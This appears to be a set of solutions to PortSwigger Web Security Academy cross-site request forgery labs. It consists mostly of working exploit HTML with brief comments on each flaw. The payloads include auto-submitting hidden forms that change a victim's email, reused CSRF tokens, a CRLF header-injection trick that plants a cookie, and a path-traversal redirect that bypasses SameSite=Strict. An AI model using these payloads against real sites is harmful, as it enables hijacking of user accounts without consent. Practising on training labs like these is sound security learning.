<!-- port swigger -->

<!-- Answer for cross site request forgery (csrf) 1  -->
<html>
	<body>
		<form method="POST" action="https://0a48004004dbf094808a5320001500c1.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hacked@wajjawd.net"/>
		</form>
           <script>
            document.forms[0].submit();
        </script>
	</body>
<html>


<!-- Answer for cross site request forgery (csrf) 2 -->
<!-- Note here, The exploitable method was GET in this case as done in the following, Even if providing ?email=anything will change the email from the input value-->

<html>
	<body>
		<form method="GET" action="https://0a13001003aa33a481e4ca0200f6001c.web-security-academy.net/my-account/change-email?email=pwend@normal-user.net">
			<input type="hidden" name="email" value="hackedbruh@evil-user.net"/>
                 </form>
        <script>
            document.forms[0].submit();
        </script>
	</body>
<html>




<!-- Answer for cross site request forgery (csrf) 3 -->
<!-- Note here, The exploitable request was that the server didn't check if the csrf was present in the email change functionalty -->

<html>
	<body>
		<form method="POST" action="https://0a0a00aa04ea0c2d81638975007f0003.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedma3lnormal-user.net1"/>
		</form>
        <script>
            document.forms[0].submit();
        </script>
	</body>
<html>





<!-- Answer for cross site request forgery (csrf) 4 -->
<!-- Note here, The exploitable request was that the server didn't check if the csrf code was connected to the same cookie of the that user  -->


<html>
	<body>
		<form method="POST" action="https://0ade009903ae0bf880e5ee6c005a002f.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedmail@normal-user.net"/>
			<input type="hidden" name="csrf" value="TJ1kSvmDxsfTeOk5CVL3cu0xSLk0VzIi"/>
		</form>
<script>
            document.forms[0].submit();
        </script>
	</body>
<html>




<!-- Answer for cross site request forgery (csrf) 5 -->
<!-- Note here, The exploitable request was that the server didn't check if the cookie csrf and csrf code was connected of the that user, As long the csrf cookie was valid and the csrf code was of that csrf cookie you could make requests  -->
<!-- regardless of that users csrf cookie and csrf code -->


<html>
	<body>
		<form method="POST" action="https://0a88006803fe31938005992100bc00d4.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedmail@normal-user.net"/>
			<input type="hidden" name="csrf" value="FuM19MpMeeFgpVKWhXQJfLHwUQbP0iSF"/>
		</form>
	<img src="https://0a88006803fe31938005992100bc00d4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=j7dbZTn0PgVaqlLBMjUHxQw7vNO1Vz7d%3b%20SameSite=None" onerror="document.forms[0].submit()">
	</body>
<html>





<!-- Answer for cross site request forgery (csrf) 6 -->
<!-- Note here, The exploitable request was that the server didn't check if the cookie csrf is a valid to the csrf code that made the request-->
<!-- So attacker can input any csrf cookie he wants -->


<html>
	<body>
		<form method="POST" action="https://0a8b00d104bd68ed808f9eeb00b900eb.web-security-academy.net/my-account/change-email">
			<input type="hidden" name="email" value="hackedma@normal-user.net"/>
			<input type="hidden" name="csrf" value="aMCnxqzEXkf0X1xn9D6CD6pqS1JUbqnx"/>
		</form>
	<img src="https://0a88006803fe31938005992100bc00d4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fakeCsrfCookie%3b%20SameSite=None" onerror="document.forms[0].submit()">
	</body>
<html>





<!-- Answer for cross site request forgery (csrf) 8 -->
<!-- Note here, The exploitable request was that the server is using sameSite=Strict - which means any request that isn't from the website it self results in a log off of that user -->
<!-- So the exploitable part of the website is the confiramtion after posting a comment in that post, Setting the postId value to GET request to change the user email -->

<script>
    document.location = "https://0ac700c8032813468207f23500c30062.web-security-academy.net/post/comment/confirmation?postId=/../../my-account/change-email?email=hacked@web-security-academy.net%26submit=1";
</script>